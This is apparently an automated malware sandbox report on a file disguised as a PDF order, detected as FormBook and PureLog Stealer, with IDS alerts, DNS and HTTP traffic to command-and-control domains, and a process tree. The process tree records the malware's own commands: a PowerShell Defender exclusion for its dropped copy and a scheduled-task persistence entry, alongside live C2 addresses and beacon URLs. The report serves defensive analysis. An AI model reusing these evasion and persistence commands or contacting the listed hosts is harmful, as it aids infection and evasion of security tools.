2024-07-31T09:54:50.373491+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51045	80	192.168.2.8	154.84.24.46
2024-07-31T09:52:03.303852+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51039	80	192.168.2.8	103.224.212.212
2024-07-31T09:53:25.022939+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51041	80	192.168.2.8	84.32.84.32
2024-07-31T09:54:26.541967+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51044	80	192.168.2.8	172.247.168.134
2024-07-31T09:54:26.704467+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51043	80	192.168.2.8	43.129.208.111
2024-07-31T09:50:35.703773+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51042	80	192.168.2.8	3.33.130.190
2024-07-31T09:51:43.452182+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51038	80	192.168.2.8	38.150.29.115
2024-07-31T09:53:04.637187+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	51040	80	192.168.2.8	172.247.228.75

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 09:51:42.721889973 CEST	51038	80	192.168.2.8	38.150.29.115
Jul 31, 2024 09:51:42.726753950 CEST	80	51038	38.150.29.115	192.168.2.8
Jul 31, 2024 09:51:42.726840973 CEST	51038	80	192.168.2.8	38.150.29.115
Jul 31, 2024 09:51:42.726953030 CEST	51038	80	192.168.2.8	38.150.29.115
Jul 31, 2024 09:51:42.731796026 CEST	80	51038	38.150.29.115	192.168.2.8
Jul 31, 2024 09:51:43.235388994 CEST	51038	80	192.168.2.8	38.150.29.115
Jul 31, 2024 09:51:43.452034950 CEST	80	51038	38.150.29.115	192.168.2.8
Jul 31, 2024 09:51:43.452182055 CEST	51038	80	192.168.2.8	38.150.29.115
Jul 31, 2024 09:52:02.795975924 CEST	51039	80	192.168.2.8	103.224.212.212
Jul 31, 2024 09:52:02.800870895 CEST	80	51039	103.224.212.212	192.168.2.8
Jul 31, 2024 09:52:02.800945044 CEST	51039	80	192.168.2.8	103.224.212.212
Jul 31, 2024 09:52:02.800991058 CEST	51039	80	192.168.2.8	103.224.212.212
Jul 31, 2024 09:52:02.805896044 CEST	80	51039	103.224.212.212	192.168.2.8
Jul 31, 2024 09:52:03.298022985 CEST	51039	80	192.168.2.8	103.224.212.212
Jul 31, 2024 09:52:03.303752899 CEST	80	51039	103.224.212.212	192.168.2.8
Jul 31, 2024 09:52:03.303852081 CEST	51039	80	192.168.2.8	103.224.212.212
Jul 31, 2024 09:53:04.027883053 CEST	51040	80	192.168.2.8	172.247.228.75
Jul 31, 2024 09:53:04.033272028 CEST	80	51040	172.247.228.75	192.168.2.8
Jul 31, 2024 09:53:04.033340931 CEST	51040	80	192.168.2.8	172.247.228.75
Jul 31, 2024 09:53:04.033442020 CEST	51040	80	192.168.2.8	172.247.228.75
Jul 31, 2024 09:53:04.039426088 CEST	80	51040	172.247.228.75	192.168.2.8
Jul 31, 2024 09:53:04.532136917 CEST	51040	80	192.168.2.8	172.247.228.75
Jul 31, 2024 09:53:04.578809977 CEST	80	51040	172.247.228.75	192.168.2.8
Jul 31, 2024 09:53:04.637128115 CEST	80	51040	172.247.228.75	192.168.2.8
Jul 31, 2024 09:53:04.637187004 CEST	51040	80	192.168.2.8	172.247.228.75
Jul 31, 2024 09:53:24.564366102 CEST	51041	80	192.168.2.8	84.32.84.32
Jul 31, 2024 09:53:24.569448948 CEST	80	51041	84.32.84.32	192.168.2.8
Jul 31, 2024 09:53:24.569518089 CEST	51041	80	192.168.2.8	84.32.84.32
Jul 31, 2024 09:53:24.569658041 CEST	51041	80	192.168.2.8	84.32.84.32
Jul 31, 2024 09:53:24.574599028 CEST	80	51041	84.32.84.32	192.168.2.8
Jul 31, 2024 09:53:25.022759914 CEST	80	51041	84.32.84.32	192.168.2.8
Jul 31, 2024 09:53:25.022869110 CEST	80	51041	84.32.84.32	192.168.2.8
Jul 31, 2024 09:53:25.022891045 CEST	51041	80	192.168.2.8	84.32.84.32
Jul 31, 2024 09:53:25.022938967 CEST	51041	80	192.168.2.8	84.32.84.32
Jul 31, 2024 09:53:25.027756929 CEST	80	51041	84.32.84.32	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 09:51:25.742264986 CEST	53	52069	162.159.36.2	192.168.2.8
Jul 31, 2024 09:51:26.222836018 CEST	53	53783	1.1.1.1	192.168.2.8
Jul 31, 2024 09:51:42.707380056 CEST	52269	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:51:42.720777035 CEST	53	52269	1.1.1.1	192.168.2.8
Jul 31, 2024 09:52:02.470093012 CEST	57307	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:52:02.795140982 CEST	53	57307	1.1.1.1	192.168.2.8
Jul 31, 2024 09:52:22.985990047 CEST	57409	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:52:23.393456936 CEST	53	57409	1.1.1.1	192.168.2.8
Jul 31, 2024 09:52:43.600915909 CEST	60606	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:52:43.964376926 CEST	53	60606	1.1.1.1	192.168.2.8
Jul 31, 2024 09:53:04.001738071 CEST	56558	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:53:04.027118921 CEST	53	56558	1.1.1.1	192.168.2.8
Jul 31, 2024 09:53:24.439841986 CEST	63437	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:53:24.563389063 CEST	53	63437	1.1.1.1	192.168.2.8
Jul 31, 2024 09:53:44.871321917 CEST	57686	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:53:44.894891024 CEST	53	57686	1.1.1.1	192.168.2.8
Jul 31, 2024 09:54:05.288549900 CEST	61512	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:54:05.316627026 CEST	53	61512	1.1.1.1	192.168.2.8
Jul 31, 2024 09:54:25.736362934 CEST	54697	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:54:25.949496031 CEST	53	54697	1.1.1.1	192.168.2.8
Jul 31, 2024 09:54:49.426348925 CEST	58945	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:54:49.834384918 CEST	53	58945	1.1.1.1	192.168.2.8
Jul 31, 2024 09:55:10.501893044 CEST	60696	53	192.168.2.8	1.1.1.1
Jul 31, 2024 09:55:10.671991110 CEST	53	60696	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 31, 2024 09:51:42.707380056 CEST	192.168.2.8	1.1.1.1	0x101c	Standard query (0)	www.qdfake609am.xyz	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:52:02.470093012 CEST	192.168.2.8	1.1.1.1	0x36f0	Standard query (0)	www.startable.online	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:52:22.985990047 CEST	192.168.2.8	1.1.1.1	0x264d	Standard query (0)	www.ygyqpswy.xyz	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:52:43.600915909 CEST	192.168.2.8	1.1.1.1	0x6056	Standard query (0)	www.163875.shop	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.001738071 CEST	192.168.2.8	1.1.1.1	0x5081	Standard query (0)	www.8548d.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:24.439841986 CEST	192.168.2.8	1.1.1.1	0x7636	Standard query (0)	www.kucinglucu.online	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:44.871321917 CEST	192.168.2.8	1.1.1.1	0x941f	Standard query (0)	www.thehalcyon.studio	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:05.288549900 CEST	192.168.2.8	1.1.1.1	0x272f	Standard query (0)	www.2025tengxun171.lat	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.736362934 CEST	192.168.2.8	1.1.1.1	0xd66a	Standard query (0)	www.8208975.com	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:49.426348925 CEST	192.168.2.8	1.1.1.1	0x1fe1	Standard query (0)	www.65597.photos	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:55:10.501893044 CEST	192.168.2.8	1.1.1.1	0x99	Standard query (0)	www.realearthpower.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 31, 2024 09:51:42.720777035 CEST	1.1.1.1	192.168.2.8	0x101c	No error (0)	www.qdfake609am.xyz	qdfake609am.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:51:42.720777035 CEST	1.1.1.1	192.168.2.8	0x101c	No error (0)	qdfake609am.xyz		38.150.29.115	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:52:02.795140982 CEST	1.1.1.1	192.168.2.8	0x36f0	No error (0)	www.startable.online		103.224.212.212	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:52:23.393456936 CEST	1.1.1.1	192.168.2.8	0x264d	Name error (3)	www.ygyqpswy.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	www.8548d.com	xpj.wj56789.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.228.75	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.228.77	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		23.224.75.50	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.228.74	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.107.131	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.107.132	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		23.224.75.52	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		23.224.75.51	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		23.224.75.54	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.107.134	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.107.133	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.228.78	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.107.130	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		172.247.228.76	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:04.027118921 CEST	1.1.1.1	192.168.2.8	0x5081	No error (0)	xpj.wj56789.com		23.224.75.53	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:24.563389063 CEST	1.1.1.1	192.168.2.8	0x7636	No error (0)	www.kucinglucu.online	kucinglucu.online		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:53:24.563389063 CEST	1.1.1.1	192.168.2.8	0x7636	No error (0)	kucinglucu.online		84.32.84.32	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:44.894891024 CEST	1.1.1.1	192.168.2.8	0x941f	No error (0)	www.thehalcyon.studio	thehalcyon.studio		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:53:44.894891024 CEST	1.1.1.1	192.168.2.8	0x941f	No error (0)	thehalcyon.studio		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:53:44.894891024 CEST	1.1.1.1	192.168.2.8	0x941f	No error (0)	thehalcyon.studio		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:05.316627026 CEST	1.1.1.1	192.168.2.8	0x272f	No error (0)	www.2025tengxun171.lat		43.129.208.111	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	www.8208975.com	m9x2dvf7.kdcq886.jhydns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	m9x2dvf7.kdcq886.jhydns.com	kd-cq288.jhydns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		172.247.168.134	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		172.247.168.125	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		172.247.127.159	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		172.247.127.147	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		154.84.24.231	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		154.84.24.230	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		66.203.156.174	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:25.949496031 CEST	1.1.1.1	192.168.2.8	0xd66a	No error (0)	kd-cq288.jhydns.com		66.203.156.173	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:54:49.834384918 CEST	1.1.1.1	192.168.2.8	0x1fe1	No error (0)	www.65597.photos	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:54:49.834384918 CEST	1.1.1.1	192.168.2.8	0x1fe1	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 31, 2024 09:54:49.834384918 CEST	1.1.1.1	192.168.2.8	0x1fe1	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		154.84.24.46	A (IP address)	IN (0x0001)	false
Jul 31, 2024 09:55:10.671991110 CEST	1.1.1.1	192.168.2.8	0x99	Name error (3)	www.realearthpower.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.qdfake609am.xyz

www.startable.online

www.8548d.com

www.kucinglucu.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	51038	38.150.29.115	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 09:51:42.726953030 CEST	167	OUT	GET /ss24/?Vt=YE/ZdGmKW74FtAWOlvaRGVRfbsx7fOwtd0JkYjwj0oStavEyCEbfL8DERV6p5jCnNdOA&Rxl=8pdPF640TxI0Gb HTTP/1.1 Host: www.qdfake609am.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	51039	103.224.212.212	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 09:52:02.800991058 CEST	168	OUT	GET /ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb HTTP/1.1 Host: www.startable.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	51040	172.247.228.75	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 09:53:04.033442020 CEST	161	OUT	GET /ss24/?Vt=AizMimZChlrhQFmDW8mDt8YQ1AEx0YD6XMUBGPJfRJKPSKhlu7m+Wdy74pBw1CXQgid8&Rxl=8pdPF640TxI0Gb HTTP/1.1 Host: www.8548d.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	51041	84.32.84.32	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 09:53:24.569658041 CEST	169	OUT	GET /ss24/?Vt=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGbnnf7fj4Pfa&Rxl=8pdPF640TxI0Gb HTTP/1.1 Host: www.kucinglucu.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 31, 2024 09:53:25.022759914 CEST	464	IN	HTTP/1.1 302 Moved Temporarily Server: hcdn Date: Wed, 31 Jul 2024 07:53:24 GMT Content-Type: text/html Content-Length: 137 Connection: close Location: https://bsky.app/profile/kucinglucu.online alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 7ed696e40d54d2a0511966334982ba49-bos-edge1 x-hcdn-cache-status: DYNAMIC Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>hcdn</center></body></html>

Target ID:	0
Start time:	03:50:40
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Imagebase:	0x150000
File size:	652'808 bytes
MD5 hash:	536F359F5908B1A9926B6337C3E520D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1425810196.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1431768421.0000000006960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:50:44
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"
Imagebase:	0x8e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:50:44
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:50:44
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp"
Imagebase:	0x1b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:50:44
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:50:45
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Imagebase:	0xb90000
File size:	652'808 bytes
MD5 hash:	536F359F5908B1A9926B6337C3E520D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:50:45
Start date:	31/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:50:46
Start date:	31/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:50:47
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
Imagebase:	0x8c0000
File size:	652'808 bytes
MD5 hash:	536F359F5908B1A9926B6337C3E520D4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1502952456.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:50:48
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x3f0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:50:52
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp"
Imagebase:	0x1b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
